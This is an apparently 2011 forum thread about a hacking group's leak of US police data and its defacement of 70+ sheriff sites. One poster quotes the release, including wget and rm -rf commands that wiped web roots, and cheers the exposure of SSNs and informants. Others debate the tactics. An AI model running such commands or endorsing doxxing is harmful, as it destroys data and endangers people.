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Renegade:
But I'm sure a few others won't... Anyways...

http://pastebin.com/iKsuRkUj

A week after we defaced and destroyed the websites of over 70 law enforcement
agencies, we are releasing a massive amount of confidential information that is
sure to embarass, discredit and incriminate police officers across the US. Over
10GB of information was leaked including hundreds of private email spools,
password information, address and social security numbers, credit card numbers,
snitch information, training files, and more. We hope that not only will
dropping this info demonstrate the inherently corrupt nature of law enforcement
using their own words, as well as result in possibly humiliation, firings, and
possible charges against several officers, but that it will also disrupt and
sabotage their ability to communicate and terrorize communities.
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They go to town on the police in a hard way.

First, they go on a rape spree, then wait a week. Just long enough for police to come out and deny the level of damage.

Next, they post all the damage and show that the police are LYING.

It's BEAUTIFUL~! I love that.

It would be one thing for the police to tell the truth, but... Lying? Yeah... I have no sympathy there.

Speaking of sympathy:

We have no sympathy for any of the officers or informants who may be endangered
by the release of their personal information. For too long they have been using
and abusing our personal information, spying on us, arresting us, beating us,
and thinking that they can get away with oppressing us in secrecy. Well it's
retribution time: we want them to experience just a taste of the kind of misery
and suffering they inflict upon us on an everyday basis. Let this serve as a
warning to would-be snitches and pigs that your leaders can no longer protect
you: give up and turn on your masters now before it's too late.
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Harsh.


For another laugh that I'm pretty sure anyone here would get a kick out of for one reason or another:

// A TALE OF TWO OWNINGS
 
It took less than 24 hours to root BJM's server and copy all their data to our
private servers. Soon after, their servers were taken down and a news article
came out suggesting they received advance FBI "credible threat" notice of a
"hacking plot". At this point it was too late for them because the stolen files
were gonna get leaked regardless. However we were surprised and delighted to see
that not only did they relaunch a few sites less than a week later, but that
their "bigger, faster server that offers more security" carried over our
backdoors from their original box. This time we were not going to hesitate to
pull the trigger: in less than an hour we rooted their new server and defaced
all 70+ domains while their root user was still logged in and active.
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Hahahahaa~! Is that not just insane?

Regarding "pull the trigger", a nice big long list (shortened here as you'll get the point):

// THIS TIME WE'RE NOT GONNA HESITATE TO PULL THE TRIGGER.
 
# wget http://our.sekret.stash/index.html
# rm -rf /var/www/vhosts/adamscosheriff.org/httpdocs/*; cp index.html
/var/www/vhosts/adamscosheriff.org/httpdocs/;
# rm -rf /var/www/vhosts/bakercountysheriffoffice.org/httpdocs/*; cp index.html
/var/www/vhosts/bakercountysheriffoffice.org/httpdocs/;
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IainB:
Wow.
This looks very bad.

The Renton police/prosecutor's response to those satirical cartoons was bad enough, I thought.
I mean - it looked like they would try to trash the 1st Amendment rights of the cartoons' creator.

I had previously always thought that the US was the last bastion of democracy and freedom.

mahesh2k:
Hoax ? or for lolz ? cause credit card number was bigger than i expected  :P

40hz:
This is going about it in entirely the wrong way. The only thing it will succeed in doing is to encourage our already secretive governments to become even more secretive. It also plays into the hands of those arguing for increasingly restrictive laws that will ultimately hurt all of us.

The nihilists and anarchist of the previous two centuries did little to effect social change or bring about reform. About the only thing they did succeed in doing was to commit the assassination that led to the first world war. I wonder how many "workers of the world" were happy about "casting off their chains" and factory jobs in order to shoulder a rifle and die in a muddy trench.

Right now, the outlaw hacking groups are little more than a mosquito bite on big  government's ass. As a result, there hasn't been too much action against them since the cost/benefit ratio hasn't justified much more than sporadic enforcement actions, strong consternation, and the passage of ineffective laws. However, should that day ever come, I think these 'naughty folk' will be stunned by the brutality and extent of the reprisals. And so will everybody else since a huge amount of collateral damage to innocent people will also likely take place in the name of "a threat to national security." Not a good way to win allies in the general community.

Right now, governments are still playing mostly by the rule of law. Those who play outside the rules are naive to think that situation will continue indefinitely if they continue down the road they're on.

Wow.
This looks very bad.

The Renton police/prosecutor's response to those satirical cartoons was bad enough, I thought.
I mean - it looked like they would try to trash the 1st Amendment rights of the cartoons' creator.

I had previously always thought that the US was the last bastion of democracy and freedom.
-IainB (August 07, 2011, 03:36 AM)
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You're right, it was.  :(

All that ended with 9/11 the passage of the Patriot Act and subsequent legislation which has turned the United States into what, for all practical purposes, is now a police state with all real power centered in the Executive Branch. And Legislature and Judiciary be damned if they don't like it.

One more brief rest stop on the way to overt national socialism - except in the USA it will use the Bible for its justification and symbolism.
 :'(


Stoic Joker:
Wow.
This looks very bad.

The Renton police/prosecutor's response to those satirical cartoons was bad enough, I thought.
I mean - it looked like they would try to trash the 1st Amendment rights of the cartoons' creator.

I had previously always thought that the US was the last bastion of democracy and freedom.
-IainB (August 07, 2011, 03:36 AM)
--- End quote ---

You're right, it was.  :(

All that ended with 9/11 the passage of the Patriot Act and subsequent legislation which has turned the United States into what, for all practical purposes, is now a police state with all real power centered in the Executive Branch. And Legislature and Judiciary be damned if they don't like it.

One more brief rest stop on the way to overt national socialism - except in the USA it will use the Bible for its justification and symbolism.
 :'(-40hz (August 07, 2011, 07:18 AM)
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Agreed. But passive acceptance and line toeing will simple accelerate the demise of our rights as US citizens. So it's nice to see someone fighting back. The meek are welcome to wait for their inheritance of earth ... But the rest of us would like to go kicking and screaming (if nobody minds...) because the "right way" to effect change on this appears to be a dead end.

To me, hacktivism is far closer to pen than sword.

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